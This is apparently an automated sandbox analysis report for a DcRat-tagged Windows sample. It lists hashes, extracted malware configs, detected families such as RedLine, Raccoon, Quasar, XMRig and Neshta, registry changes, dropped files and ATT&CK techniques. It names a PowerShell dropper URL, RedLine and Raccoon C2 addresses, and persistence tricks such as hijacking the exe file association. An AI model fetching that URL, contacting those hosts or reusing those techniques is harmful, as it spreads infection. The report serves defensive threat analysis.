dcrat | 0c951f58a23cd2c9bdccb727d41e33e740344af36d91419907ce016977b2a62d

max time kernel
285s
max time network
1400s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
16-01-2024 15:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://maxximbrasil.com/themes/config_20.ps1

Extracted

Family

redline

Botnet

@ssmvw2

45.15.156.167:80

Extracted

Family

raccoon

Botnet

afed87781b48070c555e77a16d871208

http://185.16.39.253:80/

Attributes

user_agent
MrBidenNeverKnow

xor.plain

Extracted

Family

metasploit

Version

windows/shell_reverse_tcp

127.0.0.1:12346

Signatures

DcRat 28 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe4363463463464363463463463.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeninet.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3332	schtasks.exe
6920	schtasks.exe
3316	schtasks.exe
6856	schtasks.exe
7112	schtasks.exe
3296	schtasks.exe
5548	schtasks.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Root	4363463463464363463463463.exe
1968	schtasks.exe
2776	schtasks.exe
5904	schtasks.exe
6884	schtasks.exe
5924	schtasks.exe
400	schtasks.exe
File created	C:\Program Files (x86)\ClocX\BackupAlarms.bat	ninet.exe
7340	schtasks.exe
5524	schtasks.exe
1180	schtasks.exe
6528	schtasks.exe
6056	schtasks.exe
2440	schtasks.exe
7912	schtasks.exe
7988	schtasks.exe
7916	schtasks.exe
4980	schtasks.exe
5904	schtasks.exe
2308	schtasks.exe
4824	schtasks.exe

Detect Neshta payload 1 IoCs

Processes:

resource	yara_rule
C:\odt\OFFICE~1.EXE	family_neshta

Detect ZGRat V1 33 IoCs

Processes:

resource	yara_rule
behavioral4/memory/3944-1463-0x0000000005810000-0x00000000058F6000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1469-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1476-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1479-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1481-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1483-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1485-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1487-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1489-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1491-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1493-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1495-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1497-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1472-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1499-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1501-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1466-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1505-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1503-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1509-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1507-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1511-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1513-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1515-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1518-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1522-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
behavioral4/memory/3944-1520-0x0000000005810000-0x00000000058F0000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\svchost.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\M5traider.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe	family_zgrat_v1

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe	family_quasar

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer V2 payload 3 IoCs

Processes:

resource	yara_rule
behavioral4/memory/6132-1137-0x0000000000A10000-0x0000000000A26000-memory.dmp	family_raccoon_v2
behavioral4/memory/6132-1138-0x0000000000400000-0x0000000000866000-memory.dmp	family_raccoon_v2
behavioral4/memory/6132-1465-0x0000000000400000-0x0000000000866000-memory.dmp	family_raccoon_v2

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral4/memory/5588-1118-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs

Processes:

nxmr.exewupgrdsv.exeghjkl.exeruntime-bind.exeupdater.execonhost.exe

description	pid	process	target process
PID 4188 created 3280	4188	nxmr.exe	Explorer.EXE
PID 4188 created 3280	4188	nxmr.exe	Explorer.EXE
PID 4816 created 3280	4816	wupgrdsv.exe	Explorer.EXE
PID 4816 created 3280	4816	wupgrdsv.exe	Explorer.EXE
PID 4880 created 3000	4880	ghjkl.exe	sihost.exe
PID 5556 created 3280	5556	runtime-bind.exe	Explorer.EXE
PID 5556 created 3280	5556	runtime-bind.exe	Explorer.EXE
PID 5556 created 3280	5556	runtime-bind.exe	Explorer.EXE
PID 5556 created 3280	5556	runtime-bind.exe	Explorer.EXE
PID 5556 created 3280	5556	runtime-bind.exe	Explorer.EXE
PID 2748 created 3280	2748	updater.exe	Explorer.EXE
PID 2748 created 3280	2748	updater.exe	Explorer.EXE
PID 2748 created 3280	2748	updater.exe	Explorer.EXE
PID 2748 created 3280	2748	updater.exe	Explorer.EXE
PID 5996 created 3280	5996	conhost.exe	Explorer.EXE
PID 2748 created 3280	2748	updater.exe	Explorer.EXE

XMRig Miner payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral4/memory/4816-51-0x00007FF6039D0000-0x00007FF603F46000-memory.dmp	xmrig
C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe	family_xmrig
C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe	xmrig
C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe	family_xmrig
C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe	xmrig

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

runtime-bind.exeupdater.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts runtime-bind.exe
File created C:\Windows\System32\drivers\etc\hosts updater.exe
Modifies Windows Firewall 1 TTPs 3 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exenetsh.exenetsh.exe

pid process

3316 netsh.exe
3996 netsh.exe
2488 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	runtime-bind.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

pid	process
3316	netsh.exe
3996	netsh.exe
2488	netsh.exe

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe	net_reactor

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\PAETools.exe	aspack_v212_v242

Drops startup file 1 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Synchronizer_for_installation_and_disk_space.lnk	svchost.exe

Executes dropped EXE 64 IoCs

Processes:

nxmr.exewupgrdsv.exevoice5.13sert.exevoice5.13sert.exeSynapseExploit.exe2-3-1_2023-12-14_13-35.exetuc4.exeis-AEKA1.tmpghjkl.exeBLduscfibj.execs_maltest.exeUdioConverterRipper.exeghjkl.exeBLduscfibj.exeUdioConverterRipper.exeinst77player_1.0.0.1.execonhost.exe7z.exe7z.exe7z.exeIdXsAYepwNyor9pXCym14F9nUPSKx8f.exeStringIds.exeStringIds.exesvchost.exeninet.exepayload.exeruntime-bind.exevisual-c++.exe891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exePosh_v2_dropper_x64.exeupdater.exedredyybkf.exedredyybkf.exetuc5.exeis-M0EI2.tmpstub.exexmrig.exec4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exestub.exesvchost.exestub.exesvchost.exestub.exesvchost.exestub.exesvchost.comstub.exesvchost.comsvchost.comsvchost.comstub.exesvchost.comstub.exesvchost.comstub.exesvchost.comstub.exesvchost.comstub.exesvchost.comstub.exesvchost.comstub.exesvchost.com

pid	process
4188	nxmr.exe
4816	wupgrdsv.exe
3452	voice5.13sert.exe
4948	voice5.13sert.exe
3984	SynapseExploit.exe
6132	2-3-1_2023-12-14_13-35.exe
4204	tuc4.exe
112	is-AEKA1.tmp
3292	ghjkl.exe
3708	BLduscfibj.exe
2212	cs_maltest.exe
5660	UdioConverterRipper.exe
4880	ghjkl.exe
3944	BLduscfibj.exe
5244	UdioConverterRipper.exe
4336	inst77player_1.0.0.1.exe
1820	conhost.exe
1512	7z.exe
3268	7z.exe
4944	7z.exe
5052	IdXsAYepwNyor9pXCym14F9nUPSKx8f.exe
5572	StringIds.exe
1364	StringIds.exe
1772	svchost.exe
2372	ninet.exe
1016	payload.exe
5556	runtime-bind.exe
5340	visual-c++.exe
4268	891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe
1488	Posh_v2_dropper_x64.exe
2748	updater.exe
4840	dredyybkf.exe
3796	dredyybkf.exe
5772	tuc5.exe
6012	is-M0EI2.tmp
3136	stub.exe
3068	xmrig.exe
2108	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
2200	stub.exe
4912	svchost.exe
5940	stub.exe
2184	svchost.exe
244	stub.exe
1572	svchost.exe
5316	stub.exe
4676	svchost.com
5724	stub.exe
4748	svchost.com
576	svchost.com
1484	svchost.com
5400	stub.exe
5604	svchost.com
5688	stub.exe
2728	svchost.com
5180	stub.exe
5904	svchost.com
5380	stub.exe
5484	svchost.com
4024	stub.exe
1596	svchost.com
3568	stub.exe
5548	svchost.com
3772	stub.exe
1992	svchost.com

Loads dropped DLL 53 IoCs

Processes:

voice5.13sert.exeis-AEKA1.tmpinst77player_1.0.0.1.exe7z.exe7z.exe7z.exeninet.exesvchost.exeis-M0EI2.tmpINSTAL~1.EXE

pid	process
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
4948	voice5.13sert.exe
112	is-AEKA1.tmp
4336	inst77player_1.0.0.1.exe
1512	7z.exe
3268	7z.exe
4944	7z.exe
2372	ninet.exe
2372	ninet.exe
1772	svchost.exe
6012	is-M0EI2.tmp
4396	INSTAL~1.EXE
4396	INSTAL~1.EXE

Modifies system executable filetype association 2 TTPs 1 IoCs
persistence

Modify Registry
T1112

Change Default File Association
T1546.001

Processes:

stub.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" stub.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	stub.exe

Registers COM server for autorun 1 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Processes:

ninet.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32\ThreadingModel = "Apartment"	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\NppConverter.dll"	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32\ThreadingModel = "Apartment"	ninet.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32	ninet.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\NppConverter.dll"	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32\ThreadingModel = "Apartment"	ninet.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\CLSID\{1F4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\CLSID\{2E4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\NppConverter.dll"	ninet.exe

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\update.exe	themida

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\e3dHQkrqF91hTXnDxt3lWUgG.exe	upx
C:\Users\Admin\AppData\Local\Temp\Files\pocketrar350sc.exe	upx
C:\Users\Admin\AppData\Local\Temp\Files\2014-06-12_djylh.exe	upx
C:\Users\Admin\Pictures\2rfbEciXgYVQlVrd0M2J48HC.exe	upx
C:\Users\Admin\AppData\Local\Temp\Files\Setup2010u32.exe	upx
C:\Users\Admin\Pictures\gmJEjnPaud3JYKuelLkVBSec.exe	upx

Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 141.98.234.31
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

description	ioc
Destination IP	141.98.234.31

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\Satan_AIO.exe	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

5 ipinfo.io
384 ip-api.com

flow	ioc
5	ipinfo.io
384	ip-api.com

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 12 IoCs

Processes:

SynapseExploit.exeghjkl.exeBLduscfibj.exeStringIds.exeStringIds.exeInstallUtil.exesvchost.exeIdXsAYepwNyor9pXCym14F9nUPSKx8f.exedredyybkf.exeupdater.exec4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe

description	pid	process	target process
PID 3984 set thread context of 5588	3984	SynapseExploit.exe	AppLaunch.exe
PID 3292 set thread context of 4880	3292	ghjkl.exe	ghjkl.exe
PID 3708 set thread context of 3944	3708	BLduscfibj.exe	BLduscfibj.exe
PID 5572 set thread context of 1364	5572	StringIds.exe	StringIds.exe
PID 1364 set thread context of 1896	1364	StringIds.exe	InstallUtil.exe
PID 1896 set thread context of 3500	1896	InstallUtil.exe	InstallUtil.exe
PID 1772 set thread context of 840	1772	svchost.exe	InstallUtil.exe
PID 5052 set thread context of 5748	5052	IdXsAYepwNyor9pXCym14F9nUPSKx8f.exe	RegSvcs.exe
PID 4840 set thread context of 3796	4840	dredyybkf.exe	dredyybkf.exe
PID 2748 set thread context of 5996	2748	updater.exe	conhost.exe
PID 2748 set thread context of 4600	2748	updater.exe	conhost.exe
PID 2108 set thread context of 4444	2108	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe	vbc.exe

Drops file in Program Files directory 64 IoCs

Processes:

ninet.exestub.exestub.exestub.exesvchost.exe

description	ioc	process
File created	C:\Program Files (x86)\ClocX\Presets\JaguarClock.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\Metalluhr.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\alarme.png	ninet.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\setup_wm.exe	stub.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmprph.exe	stub.exe
File created	C:\Program Files (x86)\ClocX\Presets\BallClockAmber.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\Jaguar2Clock.bmp	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\aqua-clock2.bmp	ninet.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\pwahelper.exe	stub.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpconfig.exe	stub.exe
File created	C:\Program Files (x86)\360\360Safe\deepscan\speedmem2.hg	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\roman2\roman2minute.png	ninet.exe
File created	C:\Program Files\Google\Libs\g.log	stub.exe
File created	C:\Program Files (x86)\ClocX\Presets\roman\romanminute.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\iSink.bmp	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\iToolsClock.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\romanold\romanoldmin.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Sounds\ring2.mp3	ninet.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe	stub.exe
File created	C:\Program Files (x86)\ClocX\Lang\Slovenian.lng	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\Nvidia2.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\UniversalAccessClock.bmp	ninet.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	svchost.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	svchost.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\notification_helper.exe	stub.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\pwahelper.exe	stub.exe
File created	C:\Program Files (x86)\ClocX\Lang\Hungarian.lng	ninet.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{17316~1\WINDOW~1.EXE	stub.exe
File created	C:\Program Files (x86)\ClocX\Presets\Apple.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\aquamade.ini	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\klokje.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\negro2.ini	ninet.exe
File created	C:\Program Files (x86)\ClocX\Lang\Deutsch.lng	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\BallClockAqua.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlackAppleClock.bmp	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\black and steel.png	ninet.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe	stub.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe	stub.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE	stub.exe
File created	C:\Program Files (x86)\ClocX\Lang\Japanese.lng	ninet.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge.exe	stub.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	stub.exe
File created	C:\Program Files (x86)\ClocX\Presets\Wall Clock medium.bmp	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\Wall Clock medium.ini	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\hallow2.ini	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\iToolsClock2.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\woodone\woodmin.png	ninet.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\elevation_service.exe	stub.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	stub.exe
File created	C:\Program Files (x86)\ClocX\Presets\MickeyClock.png	ninet.exe
File opened for modification	C:\PROGRA~2\Google\Update\DISABL~1.EXE	stub.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueAppleClock.ini	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\MilkClock.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\wonderglobe2.ini	ninet.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	stub.exe
File created	C:\Program Files (x86)\ClocX\Lang\Svenska.lng	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\VioletteKugler.png	ninet.exe
File created	C:\Program Files (x86)\ClocX\Presets\cowboy2.ini	ninet.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE	stub.exe
File created	C:\Program Files (x86)\ClocX\Presets\Original.png	ninet.exe

Drops file in Windows directory 64 IoCs

Processes:

svchost.comstub.exestub.exesvchost.comstub.exesvchost.comsvchost.comsvchost.comstub.exesvchost.comsvchost.comWerFault.exestub.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.comTrustedInstaller.exesvchost.comstub.exestub.exesvchost.comsvchost.comstub.exestub.exereg.exestub.exesvchost.comvbc.exestub.exestub.exeConhost.exestub.exesvchost.comsvchost.comstub.exesvchost.comstub.exesvchost.comstub.exestub.exema.exe

description	ioc	process
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	WerFault.exe
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	TrustedInstaller.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	TrustedInstaller.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\directx.sys	reg.exe
